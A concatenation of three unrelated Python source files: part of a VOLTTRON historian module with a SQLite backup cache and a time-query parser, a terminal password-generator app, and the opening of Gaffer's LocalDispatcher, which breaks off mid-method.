# meta = self._meta_data[(source, topic)].copy()
# results.append({'timestamp': timestamp.replace(tzinfo=pytz.UTC),
# 'source': source,
# 'topic': topic,
# 'value': value,
# 'headers': headers,
# 'meta': meta})
# count += 1
# if count >= size_limit:
# break
#
# return results
#
# def backup_new_data(self, new_publish_list):
# _log.debug("Backing up unpublished values.")
# for item in new_publish_list:
# source = item['source']
# topic = item['topic']
# readings = item['readings']
# headers = item.get('headers', {})
#
# for timestamp, value in readings:
# if timestamp is None:
# timestamp = get_aware_utc_now()
#
# self._deque.append((timestamp, source, topic, value, headers))
#
#
# def remove_successfully_published(self, successful_publishes,
# submit_size):
# _log.debug("Cleaning up successfully published values.")
# if len(self._deque) <= submit_size:
# self._deque.clear()
# return
# my_deque = self._deque
# for i in xrange(submit_size):
# my_deque.popleft()
class BackupDatabase:
"""
    Creates and manages a backup cache for the
:py:class:`BaseHistorianAgent` class.
Historian implementors do not need to use this class. It is for internal
use only.
"""
def __init__(self, owner, backup_storage_limit_gb, backup_storage_report,
check_same_thread=True):
# The topic cache is only meant as a local lookup and should not be
# accessed via the implemented historians.
self._backup_cache = {}
# Count of records in cache.
self._record_count = 0
self.time_error_records = False
self._meta_data = defaultdict(dict)
self._owner = weakref.ref(owner)
self._backup_storage_limit_gb = backup_storage_limit_gb
self._backup_storage_report = backup_storage_report
self._connection = None
self._setupdb(check_same_thread)
self._dupe_ids = []
self._unique_ids = []
def backup_new_data(self, new_publish_list, time_tolerance_check=False):
"""
:param new_publish_list: An iterable of records to cache to disk.
:type new_publish_list: iterable
        :param time_tolerance_check: True if the time tolerance check is enabled. Defaults to False.
        :returns: True if the cache has reached a full state.
:rtype: bool
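        Each item in `new_publish_list` is expected to look roughly like the
        following (the values shown are illustrative only):

        .. code-block:: python

            {'source': 'scrape',
             'topic': 'campus/building/device/point',
             'readings': [(timestamp, value)],
             'meta': {'units': 'F', 'type': 'float'},
             'headers': headers}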
"""
#_log.debug("Backing up unpublished values.")
c = self._connection.cursor()
self.time_error_records = False # will update at the end of the method
for item in new_publish_list:
if item is None:
continue
source = item['source']
topic = item['topic']
meta = item.get('meta', {})
readings = item['readings']
headers = item.get('headers', {})
topic_id = self._backup_cache.get(topic)
if topic_id is None:
c.execute('''INSERT INTO topics values (?,?)''',
(None, topic))
c.execute('''SELECT last_insert_rowid()''')
row = c.fetchone()
topic_id = row[0]
self._backup_cache[topic_id] = topic
self._backup_cache[topic] = topic_id
meta_dict = self._meta_data[(source, topic_id)]
for name, value in meta.items():
current_meta_value = meta_dict.get(name)
if current_meta_value != value:
c.execute('''INSERT OR REPLACE INTO metadata
values(?, ?, ?, ?)''',
(source, topic_id, name, value))
meta_dict[name] = value
# Check outside loop so that we do the check inside loop only if necessary
if time_tolerance_check:
for timestamp, value in readings:
if timestamp is None:
timestamp = get_aware_utc_now()
elif headers["time_error"]:
_log.warning(f"Found data with timestamp {timestamp} that is out of configured tolerance ")
c.execute(
'''INSERT INTO time_error
values(NULL, ?, ?, ?, ?, ?)''',
(timestamp, source, topic_id, dumps(value), dumps(headers)))
self.time_error_records = True
continue # continue to the next record. don't record in outstanding
try:
c.execute(
'''INSERT INTO outstanding
values(NULL, ?, ?, ?, ?, ?)''',
(timestamp, source, topic_id, dumps(value), dumps(headers)))
self._record_count += 1
except sqlite3.IntegrityError as e:
# In the case where we are upgrading an existing installed historian the
# unique constraint may still exist on the outstanding database.
# Ignore this case.
_log.warning(f"sqlite3.Integrity error -- {e}")
pass
else:
for timestamp, value in readings:
if timestamp is None:
timestamp = get_aware_utc_now()
try:
c.execute(
'''INSERT INTO outstanding
values(NULL, ?, ?, ?, ?, ?)''',
(timestamp, source, topic_id, dumps(value), dumps(headers)))
self._record_count += 1
except sqlite3.IntegrityError as e:
# In the case where we are upgrading an existing installed historian the
# unique constraint may still exist on the outstanding database.
# Ignore this case.
_log.warning(f"sqlite3.Integrity error -- {e}")
pass
cache_full = False
if self._backup_storage_limit_gb is not None:
try:
def page_count():
c.execute("PRAGMA page_count")
return c.fetchone()[0]
def free_count():
c.execute("PRAGMA freelist_count")
return c.fetchone()[0]
p = page_count()
f = free_count()
# check if we are over the alert threshold.
if page_count() >= self.max_pages - int(self.max_pages * (1.0 - self._backup_storage_report)):
cache_full = True
                # Now check if we are above the limit; if so, start deleting in batches of 100.
                # Note that page_count does not shrink after deletes (even if the record count
                # drops to zero) until a commit, so the freelist count is used to decide when
                # to exit the loop.
                # _log.debug(f"record count before check is {self._record_count} page count is {p}"
                #            f" free count is {f}")
                # page_count grows with inserts but freelist_count does not, so the delete loop
                # is entered based on page_count.
min_free_pages = p - self.max_pages
error_record_count = 0
get_error_count_from_db = True
while p > self.max_pages:
cache_full = True
if time_tolerance_check and get_error_count_from_db:
# if time_tolerance_check is enabled and this the first time
# we get into this loop, get the count from db
c.execute("SELECT count(ts) from time_error")
error_record_count = c.fetchone()[0]
get_error_count_from_db = False # after this we will reduce count as we delete
if error_record_count > 0:
# if time_error table has records, try deleting those first before outstanding table
_log.info("cache size exceeded limit Deleting data from time_error")
c.execute(
'''DELETE FROM time_error
WHERE ROWID IN
(SELECT ROWID FROM time_error
ORDER BY ROWID ASC LIMIT 100)''')
error_record_count -= c.rowcount
else:
                        # error record count is 0, so set time_error_records to False
                        self.time_error_records = False
                        _log.info("Cache size exceeded limit. Deleting data from outstanding.")
c.execute(
'''DELETE FROM outstanding
WHERE ROWID IN
(SELECT ROWID FROM outstanding
ORDER BY ROWID ASC LIMIT 100)''')
if self._record_count < c.rowcount:
self._record_count = 0
else:
self._record_count -= c.rowcount
p = page_count() # page count doesn't reflect delete without commit
f = free_count() # freelist count does. So using that to break from loop
if f >= min_free_pages:
break
_log.debug(f" Cleaning cache since we are over the limit. "
f"After delete of 100 records from cache"
f" record count is {self._record_count} time_error record count is {error_record_count} "
f"page count is {p} freelist count is{f}")
except Exception:
_log.exception(f"Exception when checking page count and deleting")
try:
self._connection.commit()
except Exception:
_log.exception(f"Exception in committing after back db storage")
if time_tolerance_check and not self.time_error_records:
# No time error records in this batch. Check if there are records from earlier inserts
# that admin hasn't dealt with yet.
c.execute("SELECT ROWID FROM time_error LIMIT 1")
if c.fetchone():
self.time_error_records = True
return cache_full
def remove_successfully_published(self, successful_publishes,
submit_size):
"""
Removes the reported successful publishes from the backup database.
If None is found in `successful_publishes` we assume that everything
was published.
:param successful_publishes: Set of records that was published.
:param submit_size: Number of things requested from previous call to
:py:meth:`get_outstanding_to_publish`
:type successful_publishes: set
:type submit_size: int
"""
c = self._connection.cursor()
try:
if None in successful_publishes:
c.executemany('''DELETE FROM outstanding
WHERE id = ?''',
((_id,) for _id in self._unique_ids))
if self._record_count < c.rowcount:
self._record_count = 0
else:
self._record_count -= len(self._unique_ids)
else:
temp = list(successful_publishes)
temp.sort()
c.executemany('''DELETE FROM outstanding
WHERE id = ?''',
((_id,) for _id in
successful_publishes))
self._record_count -= len(temp)
finally:
# if we don't clear these attributes on every publish, we could possibly delete a non-existing record on the next publish
self._unique_ids.clear()
self._dupe_ids.clear()
self._connection.commit()
def get_outstanding_to_publish(self, size_limit):
"""
Retrieve up to `size_limit` records from the cache. Guarantees a unique list of records,
where unique is defined as (topic, timestamp).
:param size_limit: Max number of records to retrieve.
:type size_limit: int
:returns: List of records for publication.
:rtype: list
"""
# _log.debug("Getting oldest outstanding to publish.")
c = self._connection.cursor()
c.execute('select * from outstanding order by ts limit ?', (size_limit,))
results = []
unique_records = set()
for row in c:
_id = row[0]
timestamp = row[1]
source = row[2]
topic_id = row[3]
value = loads(row[4])
headers = {} if row[5] is None else loads(row[5])
meta = self._meta_data[(source, topic_id)].copy()
topic = self._backup_cache[topic_id]
# check for duplicates before appending row to results
if (topic_id, timestamp) in unique_records:
_log.debug(f"Found duplicate from cache: {row}")
self._dupe_ids.append(_id)
continue
unique_records.add((topic_id, timestamp))
self._unique_ids.append(_id)
results.append({'_id': _id,
'timestamp': timestamp.replace(tzinfo=pytz.UTC),
'source': source,
'topic': topic,
'value': value,
'headers': headers,
'meta': meta})
c.close()
# If we were backlogged at startup and our initial estimate was
# off this will correct it.
if len(results) < size_limit:
self._record_count = len(results)
# if we have duplicates, we must count them as part of the "real" total of _record_count
if self._dupe_ids:
_log.debug(f"Adding duplicates to the total record count: {self._dupe_ids}")
self._record_count += len(self._dupe_ids)
return results
def get_backlog_count(self):
"""
Retrieve the current number of records in the cache.
"""
return self._record_count
def close(self):
self._connection.close()
self._connection = None
def _setupdb(self, check_same_thread):
""" Creates a backup database for the historian if doesn't exist."""
_log.debug("Setting up backup DB.")
if utils.is_secure_mode():
# we want to create it in the agent-data directory since agent will not have write access to any other
# directory in secure mode
backup_db = os.path.join(os.getcwd(), os.path.basename(os.getcwd()) + ".agent-data", 'backup.sqlite')
else:
backup_db = 'backup.sqlite'
_log.info(f"Creating backup db at {backup_db}")
self._connection = sqlite3.connect(
backup_db,
detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES,
check_same_thread=check_same_thread)
c = self._connection.cursor()
if self._backup_storage_limit_gb is not None:
c.execute('''PRAGMA page_size''')
page_size = c.fetchone()[0]
max_storage_bytes = self._backup_storage_limit_gb * 1024 ** 3
self.max_pages = max_storage_bytes / page_size
_log.debug(f"Max pages is {self.max_pages}")
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='outstanding';")
if c.fetchone() is None:
_log.debug("Configuring backup DB for the first time.")
self._connection.execute('''PRAGMA auto_vacuum = FULL''')
self._connection.execute('''CREATE TABLE IF NOT EXISTS outstanding
(id INTEGER PRIMARY KEY,
ts timestamp NOT NULL,
source TEXT NOT NULL,
topic_id INTEGER NOT NULL,
value_string TEXT NOT NULL,
header_string TEXT)''')
self._record_count = 0
else:
# Check to see if we have a header_string column.
c.execute("pragma table_info(outstanding);")
name_index = 0
for description in c.description:
if description[0] == "name":
break
name_index += 1
found_header_column = False
for row in c:
if row[name_index] == "header_string":
found_header_column = True
break
if not found_header_column:
_log.info("Updating cache database to support storing header data.")
c.execute("ALTER TABLE outstanding ADD COLUMN header_string text;")
# Initialize record_count at startup.
# This is a (probably correct) estimate of the total records cached.
# We do not use count() as it can be very slow if the cache is quite large.
_log.info("Counting existing rows.")
            # use the same cursor for both the execute and the fetch so the
            # estimate is actually read back from the queries below
            c.execute('''select max(id) from outstanding''')
            max_id = c.fetchone()[0]
            c.execute('''select min(id) from outstanding''')
            min_id = c.fetchone()[0]
            if max_id is not None and min_id is not None:
                self._record_count = max_id - min_id + 1
            else:
                self._record_count = 0
c.execute('''CREATE INDEX IF NOT EXISTS outstanding_ts_index
ON outstanding (ts)''')
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='time_error';")
if c.fetchone() is None:
_log.debug("Configuring backup DB for the first time.")
self._connection.execute('''PRAGMA auto_vacuum = FULL''')
self._connection.execute('''CREATE TABLE IF NOT EXISTS time_error
(id INTEGER PRIMARY KEY,
ts timestamp NOT NULL,
source TEXT NOT NULL,
topic_id INTEGER NOT NULL,
value_string TEXT NOT NULL,
header_string TEXT)''')
c.execute('''CREATE INDEX time_error_ts_index ON time_error (ts)''')
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='metadata';")
if c.fetchone() is None:
self._connection.execute('''CREATE TABLE IF NOT EXISTS metadata
(source TEXT NOT NULL,
topic_id INTEGER NOT NULL,
name TEXT NOT NULL,
value TEXT NOT NULL,
UNIQUE(topic_id, source, name))''')
else:
c.execute("SELECT * FROM metadata")
for row in c:
self._meta_data[(row[0], row[1])][row[2]] = row[3]
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='topics';")
if c.fetchone() is None:
self._connection.execute('''create table IF NOT EXISTS topics
(topic_id INTEGER PRIMARY KEY,
topic_name TEXT NOT NULL,
UNIQUE(topic_name))''')
else:
c.execute("SELECT * FROM topics")
for row in c:
self._backup_cache[row[0]] = row[1]
self._backup_cache[row[1]] = row[0]
c.close()
self._connection.commit()
# Code reimplemented from https://github.com/gilesbrown/gsqlite3
def _using_threadpool(method):
@wraps(method, ['__name__', '__doc__'])
def apply(*args, **kwargs):
return get_hub().threadpool.apply(method, args, kwargs)
return apply
class AsyncBackupDatabase(BackupDatabase):
"""Wrapper around BackupDatabase to allow it to run in the main Historian gevent loop.
Wraps the more expensive methods in threadpool.apply calls."""
def __init__(self, *args, **kwargs):
kwargs["check_same_thread"] = False
super(AsyncBackupDatabase, self).__init__(*args, **kwargs)
for method in [BackupDatabase.get_outstanding_to_publish,
BackupDatabase.remove_successfully_published,
BackupDatabase.backup_new_data,
BackupDatabase._setupdb]:
setattr(AsyncBackupDatabase, method.__name__, _using_threadpool(method))
class BaseQueryHistorianAgent(Agent):
"""This is the base agent for historian Agents that support querying of
their data stores.
"""
def __init__(self, **kwargs):
_log.debug('Constructor of BaseQueryHistorianAgent thread: {}'.format(
threading.currentThread().getName()
))
global time_parser
if time_parser is None:
if utils.is_secure_mode():
# find agent's data dir. we have write access only to that dir
for d in os.listdir(os.getcwd()):
if d.endswith(".agent-data"):
agent_data_dir = os.path.join(os.getcwd(), d)
time_parser = yacc.yacc(write_tables=0,
outputdir=agent_data_dir)
else:
time_parser = yacc.yacc(write_tables=0)
super(BaseQueryHistorianAgent, self).__init__(**kwargs)
@RPC.export
def get_version(self):
"""RPC call to get the version of the historian
:return: version number of the historian used
:rtype: string
"""
return self.version()
@abstractmethod
def version(self):
"""
Return the current version number of the historian
:return: version number
"""
@RPC.export
def get_topic_list(self):
"""RPC call to get a list of topics in data store
:return: List of topics in the data store.
:rtype: list
"""
return self.query_topic_list()
@RPC.export
def get_topics_by_pattern(self, topic_pattern):
""" Find the list of topics and its id for a given topic_pattern
:return: returns list of dictionary object {topic_name:id}"""
return self.query_topics_by_pattern(topic_pattern)
@abstractmethod
def query_topics_by_pattern(self, topic_pattern):
""" Find the list of topics and its id for a given topic_pattern
:return: returns list of dictionary object {topic_name:id}"""
pass
@abstractmethod
def query_topic_list(self):
"""
This function is called by
:py:meth:`BaseQueryHistorianAgent.get_topic_list`
        to actually get the topic list from the data store.
:return: List of topics in the data store.
:rtype: list
"""
@RPC.export
def get_aggregate_topics(self):
"""
RPC call to get the list of aggregate topics
:return: List of aggregate topics in the data store. Each list
element contains (topic_name, aggregation_type,
aggregation_time_period, metadata)
:rtype: list
"""
return self.query_aggregate_topics()
@abstractmethod
def query_aggregate_topics(self):
"""
This function is called by
:py:meth:`BaseQueryHistorianAgent.get_aggregate_topics`
to find out the available aggregates in the data store
:return: List of tuples containing (topic_name, aggregation_type,
aggregation_time_period, metadata)
:rtype: list
"""
@RPC.export
def get_topics_metadata(self, topics):
"""
RPC call to get one or more topic's metadata
:param topics: single topic or list of topics for which metadata is
requested
        :return: dictionary of the form
                 {topic_name: {metadata_key: metadata_value, ...}, ...}
        :rtype: dict
"""
if isinstance(topics, str) or isinstance(topics, list):
return self.query_topics_metadata(topics)
else:
raise ValueError(
"Please provide a valid topic name string or "
"a list of topic names. Invalid input {}".format(topics))
@abstractmethod
def query_topics_metadata(self, topics):
"""
This function is called by
:py:meth:`BaseQueryHistorianAgent.get_topics_metadata`
to find out the metadata for the given topics
:param topics: single topic or list of topics
:type topics: str or list
:return: dictionary with the format
.. code-block:: python
{topic_name: {metadata_key:metadata_value, ...},
topic_name: {metadata_key:metadata_value, ...} ...}
:rtype: dict
"""
@RPC.export
def query(self, topic=None, start=None, end=None, agg_type=None,
agg_period=None, skip=0, count=None, order="FIRST_TO_LAST"):
"""RPC call to query an Historian for time series data.
:param topic: Topic or topics to query for.
:param start: Start time of the query. Defaults to None which is the
beginning of time.
:param end: End time of the query. Defaults to None which is the
end of time.
:param skip: Skip this number of results.
:param count: Limit results to this value.
:param order: How to order the results, either "FIRST_TO_LAST" or
"LAST_TO_FIRST"
:type topic: str or list
:type start: str
:type end: str
:param agg_type: If this is a query for aggregate data, the type of
aggregation ( for example, sum, avg)
:param agg_period: If this is a query for aggregate data, the time
period of aggregation
:type skip: int
:type count: int
:type order: str
:return: Results of the query
:rtype: dict
Return values will have the following form:
.. code-block:: python
{
"values": [(<timestamp string1>: value1),
(<timestamp string2>: value2),
...],
"metadata": {"key1": value1,
"key2": value2,
...}
}
The string arguments can be either the output from
:py:func:`volttron.platform.agent.utils.format_timestamp` or the
special string "now".
Times relative to "now" may be specified with a relative time string
using the Unix "at"-style specifications. For instance "now -1h" will
specify one hour ago.
"now -1d -1h -20m" would specify 25 hours and 20 minutes ago.
"""
if topic is None:
raise TypeError('"Topic" required')
if agg_type:
if not agg_period:
raise TypeError("You should provide both aggregation type"
"(agg_type) and aggregation time period"
"(agg_period) to query aggregate data")
else:
if agg_period:
raise TypeError("You should provide both aggregation type"
"(agg_type) and aggregation time period"
"(agg_period) to query aggregate data")
if agg_period:
agg_period = AggregateHistorian.normalize_aggregation_time_period(
agg_period)
if start is not None:
try:
start = parse_timestamp_string(start)
except (ValueError, TypeError):
start = time_parser.parse(start)
if start and start.tzinfo is None:
start = start.replace(tzinfo=pytz.UTC)
if end is not None:
try:
end = parse_timestamp_string(end)
except (ValueError, TypeError):
end = time_parser.parse(end)
if end and end.tzinfo is None:
end = end.replace(tzinfo=pytz.UTC)
if start:
_log.debug("start={}".format(start))
results = self.query_historian(topic, start, end, agg_type,
agg_period, skip, count, order)
metadata = results.get("metadata", None)
values = results.get("values", None)
if values and metadata is None:
results['metadata'] = {}
return results
@abstractmethod
def query_historian(self, topic, start=None, end=None, agg_type=None,
agg_period=None, skip=0, count=None, order=None):
"""
This function is called by :py:meth:`BaseQueryHistorianAgent.query`
to actually query the data store and must return the results of a
query in the following format:
**Single topic query:**
.. code-block:: python
{
"values": [(timestamp1, value1),
                           (timestamp2, value2),
...],
"metadata": {"key1": value1,
"key2": value2,
...}
}
**Multiple topics query:**
.. code-block:: python
{
"values": {topic_name:[(timestamp1, value1),
                                   (timestamp2, value2),
...],
topic_name:[(timestamp1, value1),
                                   (timestamp2, value2),
...],
...}
"metadata": {} #empty metadata
}
Timestamps must be strings formatted by
:py:func:`volttron.platform.agent.utils.format_timestamp`.
"metadata" is not required. The caller will normalize this to {} for
you if it is missing.
:param topic: Topic or list of topics to query for.
:param start: Start of query timestamp as a datetime.
:param end: End of query timestamp as a datetime.
:param agg_type: If this is a query for aggregate data, the type of
aggregation ( for example, sum, avg)
:param agg_period: If this is a query for aggregate data, the time
period of aggregation
:param skip: Skip this number of results.
:param count: Limit results to this value. When the query is for
multiple topics, count applies to individual topics. For
example, a query on 2 topics with count=5 will return 5
records for each topic
:param order: How to order the results, either "FIRST_TO_LAST" or
"LAST_TO_FIRST"
:type topic: str or list
:type start: datetime
:type end: datetime
:type skip: int
:type count: int
:type order: str
:return: Results of the query
:rtype: dict
"""
class BaseHistorian(BaseHistorianAgent, BaseQueryHistorianAgent):
def __init__(self, **kwargs):
_log.debug('Constructor of BaseHistorian thread: {}'.format(
threading.currentThread().getName()
))
super(BaseHistorian, self).__init__(**kwargs)
# The following code is
# Copyright (c) 2011, 2012, Regents of the University of California
# and is under the same licence as the remainder of the code in this file.
# Modification were made to remove unneeded pieces and to fit with the
# intended use.
import ply.lex as lex
import ply.yacc as yacc
from dateutil.tz import gettz
from tzlocal import get_localzone
# use get_localzone from tzlocal instead of dateutil.tz.tzlocal as dateutil
# tzlocal does not take into account day light savings time
local = get_localzone()
def now(tzstr='UTC'):
"""Returns an aware datetime object with the current time in
tzstr timezone"""
if tzstr == 'Local':
tz = local
else:
tz = gettz(tzstr)
return datetime.now(tz)
def strptime_tz(str, format='%x %X', tzstr='Local'):
"""Returns an aware datetime object. tzstr is a timezone string such as
'US/Pacific' or 'Local' by default which uses the local timezone.
"""
dt = datetime.strptime(str, format)
if tzstr == 'Local':
tz = local
else:
tz = gettz(tzstr)
return dt.replace(tzinfo=tz)
tokens = ('NOW', "QSTRING", 'LVALUE', 'NUMBER')
reserved = {
'now': 'NOW'}
literals = '()[]*^.,<>=+-/'
time_units = re.compile('^(d|days?|h|hours?|m|minutes?|s|seconds?)$')
def get_timeunit(t):
if not time_units.match(t):
raise ValueError("Invalid timeunit: %s" % t)
if t.startswith('d'):
return 'days'
elif t.startswith('h'):
return 'hours'
elif t.startswith('m'):
return 'minutes'
elif t.startswith('s'):
return 'seconds'
def t_QSTRING(t):
r"""("[^"\\]*?(\\.[^"\\]*?)*?")|(\'[^\'\\]*?(\\.[^\'\\]*?)*?\')"""
if t.value[0] == '"':
t.value = t.value[1:-1].replace('\\"', '"')
elif t.value[0] == "'":
t.value = t.value[1:-1].replace("\\'", "'")
return t
def t_LVALUE(t):
r"""[a-zA-Z\~\$\_][a-zA-Z0-9\/\%_\-]*"""
t.type = reserved.get(t.value, 'LVALUE')
return t
def t_NUMBER(t):
r"""([+-]?([0-9]*\.)?[0-9]+)"""
if '.' in t.value:
try:
t.value = float(t.value)
except ValueError:
print("Invalid floating point number", t.value)
t.value = 0
else:
try:
t.value = int(t.value)
except ValueError:
print("Integer value too large %d", t.value)
t.value = 0
return t
is_number = lambda x: isinstance(x, int) or isinstance(x, float)
t_ignore = " \t"
def t_newline(t):
r"""[\n\r]+"""
t.lexer.lineno += t.value.count("\n")
def t_error(t):
raise ValueError("Syntax Error in Query")
# print("Illegal character '%s'" % t.value[0])
# t.lexer.skip(1)
smapql_lex = lex.lex()
TIMEZONE_PATTERNS = [
"%m/%d/%Y",
"%m/%d/%Y %H:%M",
"%Y-%m-%dT%H:%M:%S",
"%Y-%m-%dT%H:%M:%S.%f",
]
def parse_time(ts):
for pat in TIMEZONE_PATTERNS:
try:
return strptime_tz(ts, pat)
except ValueError:
continue
raise ValueError("Invalid time string:" + ts)
def p_query_pair(t):
"""query : '(' timeref ',' timeref ')' """
t[0] = (t[2], t[4])
def p_query_single(t):
"""query : timeref """
t[0] = t[1]
# an absolute time reference. can be a unix timestamp, a date string,
# or "now"
def p_timeref(t):
"""timeref : abstime
| abstime reltime"""
t[0] = t[1]
if len(t) == 2:
ref = t[1]
else:
ref = t[1] + t[2]
t[0] = ref
def p_abstime(t):
"""abstime : NUMBER
| QSTRING
| NOW"""
if t[1] == 'now':
t[0] = now()
    elif isinstance(t[1], str):
t[0] = parse_time(t[1])
else:
t[0] = datetime.utcfromtimestamp(t[1] / 1000)
def p_reltime(t):
"""reltime : NUMBER LVALUE
| NUMBER LVALUE reltime"""
timeunit = get_timeunit(t[2])
delta = timedelta(**{timeunit: t[1]})
if len(t) == 3:
t[0] = delta
else:
t[0] = t[3] + delta
# Error rule for syntax errors
def p_error(p):
raise ValueError("Syntax Error in Query")
|
app.py
|
from threading import Thread
import time
import npyscreen
import pyperclip
from restpass import PAYLOAD
from restpass.generator import Generator
MAX_CHARS = 30
def copy_button(parent_app):
class CopyButton(npyscreen.ButtonPress):
def __init__(self, *args, **keywords):
super().__init__(*args, **keywords)
def whenPressed(self):
if parent_app.output_raw:
pyperclip.copy(parent_app.output_raw)
parent_app.output_raw = ""
parent_app.reset_widgets()
return CopyButton
def paste_button(destination):
class PasteButton(npyscreen.ButtonPress):
def __init__(self, *args, **keywords):
super().__init__(*args, **keywords)
def whenPressed(self):
destination.set_value(pyperclip.paste())
return PasteButton
class RestpassApp(npyscreen.NPSAppManaged):
    def __init__(self):
        super().__init__()
        # initialized here so the Copy button works before any output is generated
        self.output_raw = ""
def init_widgets(self):
self.form = npyscreen.Form(name=f"{PAYLOAD['name']}-v{PAYLOAD['version']}")
self.hide_output_checkbox = self.form.add(npyscreen.Checkbox, name="Hide output", value=False)
self.show_length_slider = self.form.add(npyscreen.TitleSlider, out_of=MAX_CHARS, name="Show length:")
self.separator()
self.length_slider = self.form.add(npyscreen.TitleSlider, value=8, lowest=3, out_of=MAX_CHARS, name="Length:")
self.input_entry = self.form.add(npyscreen.TitlePassword, name="Input:")
self.input_paste_button = self.form.add(paste_button(destination=self.input_entry), name="Paste")
self.salt_entry = self.form.add(npyscreen.TitlePassword, name="Salt:")
self.salt_paste_button = self.form.add(paste_button(destination=self.salt_entry), name="Paste")
self.alphabet_select = self.form.add(npyscreen.TitleMultiSelect, max_height=4, value=[0, 1, 2], name="Alphabet:", values=["Digits", "Lowercase", "Uppercase", "Symbols"], scroll_exit=True)
self.separator()
self.output_title = self.form.add(npyscreen.TitleFixedText, name="Output:")
self.copy_button = self.form.add(copy_button(parent_app=self), name="Copy")
def reset_widgets(self):
self.input_entry.set_value("")
self.salt_entry.set_value("")
self.length_slider.set_value(3)
self.alphabet_select.set_value([0, 1, 2])
def separator(self):
self.form.add(npyscreen.FixedText, value="––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––")
def main(self):
self.init_widgets()
thread = Thread(target=self.update, name="UPDATE")
thread.daemon = True
thread.start()
try:
self.form.edit()
# thread.join()
except KeyboardInterrupt:
pass
def update(self, delay=0.01):
while True:
source = self.input_entry.get_value()
alphabet = self.alphabet_select.get_selected_objects()
if source and alphabet:
generator = Generator(source=source)
if self.salt_entry.get_value():
generator.set_salt(self.salt_entry.get_value().encode("utf-8"))
generator.set_rules(digits="Digits" in alphabet,
lowercase="Lowercase" in alphabet,
uppercase="Uppercase" in alphabet,
symbols="Symbols" in alphabet)
self.output_raw = generator.generate(length=int(self.length_slider.get_value()))
if self.hide_output_checkbox.value:
show_length = int(self.show_length_slider.get_value())
output_str = self.output_raw[:show_length] + "*" * (len(self.output_raw) - show_length)
else:
output_str = self.output_raw
self.output_title.set_value(output_str)
else:
self.output_title.set_value("")
self.form.display()
time.sleep(delay)
|
LocalDispatcher.py
|
##########################################################################
#
# Copyright (c) 2013-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import errno
import signal
import shlex
import subprocess32 as subprocess
import threading
import time
import traceback
import IECore
import Gaffer
import GafferDispatch
class LocalDispatcher( GafferDispatch.Dispatcher ) :
def __init__( self, name = "LocalDispatcher", jobPool = None ) :
GafferDispatch.Dispatcher.__init__( self, name )
self["executeInBackground"] = Gaffer.BoolPlug( defaultValue = False )
self["ignoreScriptLoadErrors"] = Gaffer.BoolPlug( defaultValue = False )
self["environmentCommand"] = Gaffer.StringPlug()
self.__jobPool = jobPool if jobPool else LocalDispatcher.defaultJobPool()
class Job( object ) :
Status = IECore.Enum.create( "Waiting", "Running", "Complete", "Failed", "Killed" )
def __init__( self, batch, dispatcher, name, jobId, directory ) :
assert( isinstance( batch, GafferDispatch.Dispatcher._TaskBatch ) )
assert( isinstance( dispatcher, GafferDispatch.Dispatcher ) )
self.__batch = batch
## \todo Stop storing this. It's just a temptation to access potentially
# invalid data during background dispatches - all dispatcher settings _must_
# be copied to the job upon construction, because nothing stops a user changing
# the dispatcher settings during a background dispatch. Currently __dispatcher
# is used to access the JobPool in __reportCompleted etc - instead the job should
# use signals to report changes in status, and the JobPool should connect to those
# signals. Jobs should be blissfully ignorant of JobPools.
self.__dispatcher = dispatcher
script = batch.preTasks()[0].plug().ancestor( Gaffer.ScriptNode )
self.__context = Gaffer.Context( script.context() )
self.__name = name
self.__id = jobId
self.__directory = directory
self.__stats = {}
self.__ignoreScriptLoadErrors = dispatcher["ignoreScriptLoadErrors"].getValue()
## \todo Make `Dispatcher::dispatch()` use a Process, so we don't need to
# do substitutions manually like this.
self.__environmentCommand = Gaffer.Context.current().substitute(
dispatcher["environmentCommand"].getValue()
)
self.__messageHandler = IECore.CapturingMessageHandler()
self.__messageTitle = "%s : Job %s %s" % ( self.__dispatcher.getName(), self.__name, self.__id )
scriptFileName = script["fileName"].getValue()
self.__scriptFile = os.path.join( self.__directory, os.path.basename( scriptFileName ) if scriptFileName else "untitled.gfr" )
script.serialiseToFile( self.__scriptFile )
self.__storeNodeNames( script, batch )
self.__setStatus( batch, LocalDispatcher.Job.Status.Waiting, recursive = True )
def name( self ) :
return self.__name
def id( self ) :
return self.__id
def directory( self ) :
return self.__directory
def description( self ) :
batch = self.__currentBatch( self.__batch )
if batch is None or batch.plug() is None :
return "N/A"
frames = str( IECore.frameListFromList( [ int(x) for x in batch.frames() ] ) )
return "Executing " + batch.blindData()["nodeName"].value + " on frames " + frames
def statistics( self ) :
batch = self.__currentBatch( self.__batch )
if batch is None or "pid" not in batch.blindData().keys() :
return {}
rss = 0
pcpu = 0.0
